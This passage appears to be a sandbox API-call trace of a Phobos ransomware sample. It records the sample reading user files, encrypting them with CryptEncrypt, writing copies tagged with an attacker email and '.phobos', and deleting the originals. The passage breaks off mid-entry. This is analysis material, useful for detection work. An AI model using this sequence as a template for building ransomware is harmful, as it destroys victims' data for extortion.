(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms")) returned 0x2020 [0206.216] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0206.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0206.217] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.217] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0206.217] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0206.217] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.217] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7000, lpOverlapped=0x0) returned 1 [0206.474] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010, dwBufLen=0x7010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010) returned 1 [0206.474] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7010, lpOverlapped=0x0) returned 1 [0206.475] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0206.475] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.475] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0206.475] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.475] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0206.475] CryptDestroyKey (hKey=0xa328e8) returned 1 [0206.475] CloseHandle (hObject=0xfc) returned 1 [0206.476] CloseHandle (hObject=0x178) returned 1 [0206.476] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at work~.feed-ms")) returned 1 [0206.477] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0206.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0206.477] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=28672) returned 1 [0206.477] CloseHandle (hObject=0x178) returned 1 [0206.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms")) returned 0x2020 [0206.477] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0206.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0206.478] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.478] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0206.478] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0206.478] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.478] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7000, lpOverlapped=0x0) returned 1 [0206.506] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010, dwBufLen=0x7010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010) returned 1 [0206.507] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7010, lpOverlapped=0x0) returned 1 [0206.508] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0206.508] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.508] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0206.508] CryptDestroyKey (hKey=0xa32928) returned 1 [0206.508] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0206.509] CryptDestroyKey (hKey=0xa328e8) returned 1 [0206.509] CloseHandle (hObject=0x178) returned 1 [0206.509] CloseHandle (hObject=0xfc) returned 1 [0206.509] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms")) returned 1 [0206.510] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0206.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0206.511] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=28672) returned 1 [0206.511] CloseHandle (hObject=0xfc) returned 1 [0206.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms")) returned 0x2020 [0206.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0206.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0206.511] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.511] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0206.592] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0206.592] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.592] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7000, lpOverlapped=0x0) returned 1 [0206.764] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010, dwBufLen=0x7010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7010) returned 1 [0206.764] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7010, lpOverlapped=0x0) returned 1 [0206.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0206.766] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.766] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0206.766] CryptDestroyKey (hKey=0xa32a28) returned 1 [0206.766] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0206.766] CryptDestroyKey (hKey=0xa328e8) returned 1 [0206.766] CloseHandle (hObject=0xfc) returned 1 [0206.766] CloseHandle (hObject=0x178) returned 1 [0206.766] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms")) returned 1 [0206.767] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0206.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0206.769] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=69740) returned 1 [0206.769] CloseHandle (hObject=0x178) returned 1 [0206.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb")) returned 0x2020 [0206.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0206.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0206.769] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.769] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0206.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0206.770] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0206.770] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0206.770] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1106c, lpOverlapped=0x0) returned 1 [0207.067] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x11070, dwBufLen=0x11070 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x11070) returned 1 [0207.067] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x11070, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x11070, lpOverlapped=0x0) returned 1 [0207.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0207.069] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.069] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0207.070] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.070] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0207.070] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.070] CloseHandle (hObject=0x178) returned 1 [0207.070] CloseHandle (hObject=0xfc) returned 1 [0207.070] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb")) returned 1 [0207.071] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.073] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1044) returned 1 [0207.073] CloseHandle (hObject=0xfc) returned 1 [0207.073] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl")) returned 0x2020 [0207.073] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0207.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0207.073] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.073] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0207.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.074] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0207.074] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.074] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x414, lpOverlapped=0x0) returned 1 [0207.155] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0207.155] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0207.156] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0207.156] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0207.156] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0207.156] CryptDestroyKey (hKey=0xa32928) returned 1 [0207.156] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0207.156] CryptDestroyKey (hKey=0xa328e8) returned 1 [0207.156] CloseHandle (hObject=0xfc) returned 1 [0207.156] CloseHandle (hObject=0x178) returned 1 [0207.156] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl")) returned 1 [0207.158] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0207.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0207.158] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=797) returned 1 [0207.158] CloseHandle (hObject=0x178) returned 1 [0207.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl")) returned 